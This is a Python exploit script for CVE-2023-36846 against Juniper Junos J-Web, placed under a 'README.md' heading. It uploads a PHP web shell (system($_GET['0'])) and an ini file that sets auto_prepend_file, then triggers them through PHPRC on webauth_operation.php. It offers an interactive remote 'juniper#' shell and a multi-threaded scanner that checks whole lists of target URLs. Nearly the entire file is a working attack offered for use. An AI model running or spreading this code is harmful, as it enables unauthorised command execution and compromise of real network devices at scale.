# README.md
# Rendering markdown...
import re
import os
import base64
import urllib3
import argparse
import requests
import concurrent.futures
from threading import Lock
from rich.console import Console
from alive_progress import alive_bar
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit.history import InMemoryHistory
# Every request in this script is sent with verify=False; silence the
# InsecureRequestWarning urllib3 would otherwise emit for each of them.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class BalgoExploit:
    """HTTP client for the CVE-2023-36846 check against ``webauth_operation.php``.

    The check uploads a PHP file and an ini file through the ``do_upload``
    handler, then requests the endpoint with ``PHPRC`` pointing at the
    uploaded ini file and extracts whatever the server prints between the
    ``[S]`` and ``[E]`` markers.

    Attributes:
        url: Base URL of the target; request paths are appended to it as-is.
        console: ``rich`` console used for status messages.
        output: Path of the results file, or a falsy value for none.
        verbose: ``True`` when ``output`` is set. Despite the name, a true
            value *suppresses* the per-target failure messages.
    """

    # Compiled once; raw strings avoid the invalid-escape warnings that the
    # non-raw spellings ("\:" and "\[") trigger on recent Python versions.
    _UPLOADED_NAME_RE = re.compile(r"0\: '(.*?)'\},")
    _COMMAND_OUTPUT_RE = re.compile(r"\[S\](.*?)\[E\]", re.DOTALL)

    def __init__(self, url, output):
        self.url = url
        self.console = Console()
        self.output = output
        self.verbose = bool(self.output)

    @staticmethod
    def _build_upload_data(content, mime_type, file_name):
        """Return the form fields for a ``do_upload`` request.

        ``content`` must be ASCII; it is base64-encoded into a ``data:`` URI.
        """
        encoded = base64.b64encode(content.encode("ascii")).decode("ascii")
        return {
            "rs": "do_upload",
            "rsargs[0]": (
                f'[{{"fileData":"data:{mime_type};base64,{encoded}",'
                f'"fileName":"{file_name}","csize":{len(content)}}}]'
            ),
        }

    @classmethod
    def _parse_uploaded_name(cls, response_text):
        """Return the stored file name reported in an upload response, or None."""
        match = cls._UPLOADED_NAME_RE.search(response_text)
        return match.group(1) if match else None

    @classmethod
    def _parse_command_output(cls, response_text):
        """Return the stripped text between ``[S]`` and ``[E]``, or None."""
        match = cls._COMMAND_OUTPUT_RE.search(response_text)
        return match.group(1).strip() if match else None

    def _upload(self, content, mime_type, file_name, label):
        """Upload ``content`` and return the server-side file name, or None.

        A failure message is printed only when ``self.verbose`` is false, but
        ``None`` is returned on failure in either mode.
        """
        response = requests.post(
            f"{self.url}/webauth_operation.php",
            headers={"Content-Type": "application/x-www-form-urlencoded"},
            data=self._build_upload_data(content, mime_type, file_name),
            verify=False,
            timeout=5,
        )
        stored_name = self._parse_uploaded_name(response.text)
        if stored_name is None and not self.verbose:
            self.console.print(
                f"[bold red][-] Failed to upload {label} file for {self.url}[/bold red]"
            )
        return stored_name

    def upload_php(self, php_payload):
        """Upload ``php_payload`` and return its stored file name, or None."""
        return self._upload(php_payload, "text/html", "watchTowr.php", "php")

    def upload_ini(self, php_path):
        """Upload an ini file that auto-prepends ``/var/tmp/<php_path>``.

        Returns the stored ini file name, or None when the upload fails or
        when ``php_path`` is None (no request is sent in that case).
        """
        if php_path is None:
            return None
        ini_payload = f'auto_prepend_file="/var/tmp/{php_path}"'
        return self._upload(ini_payload, "plain/text", "watchTowr.ini", "ini")

    def execute_webshell(self, ini_file, cmd):
        """Request the endpoint with ``PHPRC`` set and return the marked output.

        ``cmd`` is placed verbatim after ``&0=`` in the query string. Returns
        the stripped text between ``[S]`` and ``[E]``, or None if the markers
        are absent from the response.
        """
        exec_url = f"{self.url}/webauth_operation.php?PHPRC=/var/tmp/{ini_file}&0={cmd}"
        response = requests.get(exec_url, verify=False, timeout=5)
        return self._parse_command_output(response.text)

    def run(self, cmd, delete=None):
        """Upload both files, run ``cmd`` once, and return its output.

        Args:
            cmd: Command string passed to :meth:`execute_webshell`.
            delete: When truthy, send the cleanup request afterwards.

        Returns:
            The command output, or None if either upload failed or the
            response carried no ``[S]``/``[E]`` markers.

        Raises:
            requests.RequestException: Propagated from the HTTP calls.
            OSError: If the output file cannot be opened for appending.
        """
        php_payload = (
            "<?php if(isset($_GET['delete'])) { @unlink(__FILE__); } "
            "else { echo '[S]'; system($_GET['0']); echo '[E]'; } ?>"
        )
        php_path = self.upload_php(php_payload)
        if php_path is None:
            # Stop here instead of uploading an ini that points at "None".
            return None
        ini_file = self.upload_ini(php_path)
        if ini_file is None:
            return None

        result = self.execute_webshell(ini_file, cmd)
        if result and self.output:
            with open(self.output, "a") as f:
                f.write(self.url + "\n")
        if delete:
            # NOTE(review): this produces "...&0=delete=1", i.e. the text
            # "delete=1" is the *value* of parameter "0" rather than a
            # separate "delete" parameter, so the payload's unlink branch is
            # probably never reached. Confirm before relying on this cleanup.
            self.execute_webshell(ini_file, "delete=1")
        return result
class JunosShell:
    """Interactive prompt that forwards typed commands through an exploit object.

    ``exploit`` must provide ``execute_webshell(ini_file, cmd)``.
    """

    _EXIT_WORDS = frozenset({"exit", "quit"})

    def __init__(self, exploit):
        self.exploit = exploit
        self.console = Console()

    @classmethod
    def _classify(cls, command):
        """Map a typed line to ``"skip"``, ``"exit"``, ``"clear"`` or ``"exec"``.

        Only the exact word ``clear`` clears the local terminal; a command
        that merely contains "clear" is forwarded like any other command.
        """
        normalized = command.strip().lower()
        if not normalized:
            return "skip"
        if normalized in cls._EXIT_WORDS:
            return "exit"
        if normalized == "clear":
            return "clear"
        return "exec"

    def _cleanup(self, ini_file):
        """Send the cleanup request and print the exit message (best effort)."""
        try:
            self.exploit.execute_webshell(ini_file, "delete=1")
        except requests.RequestException as exc:
            # markup=False: exception text may contain square brackets.
            self.console.print(
                f"[-] Cleanup request failed: {exc}", style="bold red", markup=False
            )
        self.console.print("[bold yellow][!] Exiting JunOS shell and cleaning up...[/bold yellow]")

    def interactive_shell(self, ini_file):
        """Read commands until exit/quit, Ctrl-C or Ctrl-D, then clean up.

        Args:
            ini_file: Stored ini file name passed to every
                ``execute_webshell`` call.
        """
        self.console.print("\n[bold magenta][*] Entering JunOS interactive shell mode...[/bold magenta]")
        session = PromptSession(history=InMemoryHistory())
        try:
            while True:
                command = session.prompt(HTML('<ansired><b>juniper# </b></ansired>'))
                action = self._classify(command)
                if action == "exit":
                    break
                if action == "skip":
                    continue
                if action == "clear":
                    os.system('clear' if os.name == 'posix' else 'cls')
                    continue
                try:
                    result = self.exploit.execute_webshell(ini_file, command.strip())
                except requests.RequestException as exc:
                    # A single failed request should not end the session.
                    self.console.print(
                        f"[-] Request failed: {exc}", style="bold red", markup=False
                    )
                    continue
                self.console.print(f"[bold green][-] Execution Results:[/bold green]\n[bold yellow]{result}[/bold yellow]")
        except (KeyboardInterrupt, EOFError):
            # Ctrl-C / Ctrl-D: fall through to the same cleanup as "exit".
            pass
        self._cleanup(ini_file)
def check_vulnerability(url, output=None):
    """Run the one-shot check against ``url`` and report the outcome.

    Args:
        url: Base URL of the target.
        output: Optional path of a file to which vulnerable URLs are appended.

    Returns:
        True if the check produced output, False otherwise (including when
        the check raised an error).
    """
    exploit = BalgoExploit(url, output)
    try:
        response = exploit.run("echo Vulnerable", delete=True)
    except Exception as exc:
        # Best effort: one unreachable or misbehaving target must not abort a
        # scan. Unlike a bare ``except``, this lets KeyboardInterrupt and
        # SystemExit through.
        if not exploit.verbose:
            # markup=False: exception text may contain square brackets.
            exploit.console.print(
                f"[X] {url} could not be checked: {exc}", style="bold red", markup=False
            )
        return False

    if response is None:
        if not exploit.verbose:
            exploit.console.print(f"[bold red][X] {url} does not seem to be vulnerable![/bold red]")
        return False

    exploit.console.print(
        f"[bold red][+] {url} is vulnerable to CVE-2023-36846[/bold red]\n"
        f"[bold green][-] Extracted Output:[/bold green] "
        f"[bold yellow]{response}[/bold yellow]"
    )
    # ``run`` already appends the URL whenever it returns non-empty output, so
    # writing again here would list the target twice. Only the empty-output
    # case still needs recording.
    if output and not response:
        try:
            with open(output, "a") as f:
                f.write(url + "\n")
        except OSError as exc:
            exploit.console.print(
                f"[-] Could not write to {output}: {exc}", style="bold red", markup=False
            )
    return True
def main():
    """Parse command-line arguments and run single-URL or file mode.

    With ``--url`` the target is checked and, if the check succeeds, an
    interactive shell is started. With ``--file`` every non-blank line of the
    file is checked concurrently. With neither, the usage text is printed.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--threads", type=int, default=50, help="Number of threads for concurrent scanning")
    parser.add_argument("-o", "--output", help="Output file")
    parser.add_argument("-f", "--file", help="Input file containing list of URLs")
    parser.add_argument("-u", "--url", help="Target url in the format https://localhost")
    args = parser.parse_args()

    if args.url:
        if not check_vulnerability(args.url, args.output):
            return
        exploit = BalgoExploit(args.url, args.output)
        php_payload = (
            "<?php if(isset($_GET['delete'])) { @unlink(__FILE__); } "
            "else { echo '[S]'; system($_GET['0']); echo '[E]'; } ?>"
        )
        try:
            php_path = exploit.upload_php(php_payload)
            ini_file = exploit.upload_ini(php_path) if php_path is not None else None
        except requests.RequestException as exc:
            exploit.console.print(
                f"[-] Request failed: {exc}", style="bold red", markup=False
            )
            return
        if ini_file is None:
            # Without a stored ini file name the shell has nothing to reference.
            exploit.console.print("[bold red][-] Upload failed; not starting the interactive shell[/bold red]")
            return
        JunosShell(exploit).interactive_shell(ini_file)
    elif args.file:
        if args.threads < 1:
            parser.error("--threads must be at least 1")
        with open(args.file, "r") as f:
            # Skip blank lines so they are not treated as targets.
            urls = [line.strip() for line in f if line.strip()]
        if not urls:
            parser.error(f"no URLs found in {args.file}")

        bar_lock = Lock()

        with alive_bar(len(urls), title="Processing URLs") as bar:

            def safe_check_vulnerability(url, output):
                # Advance the bar even if the check raises, so the total
                # always matches the number of URLs processed.
                try:
                    check_vulnerability(url, output)
                finally:
                    with bar_lock:
                        bar()

            with concurrent.futures.ThreadPoolExecutor(max_workers=args.threads) as executor:
                executor.map(safe_check_vulnerability, urls, [args.output] * len(urls))
    else:
        parser.print_help()
# Run the command-line interface only when executed as a script, not on import.
if __name__ == "__main__":
    main()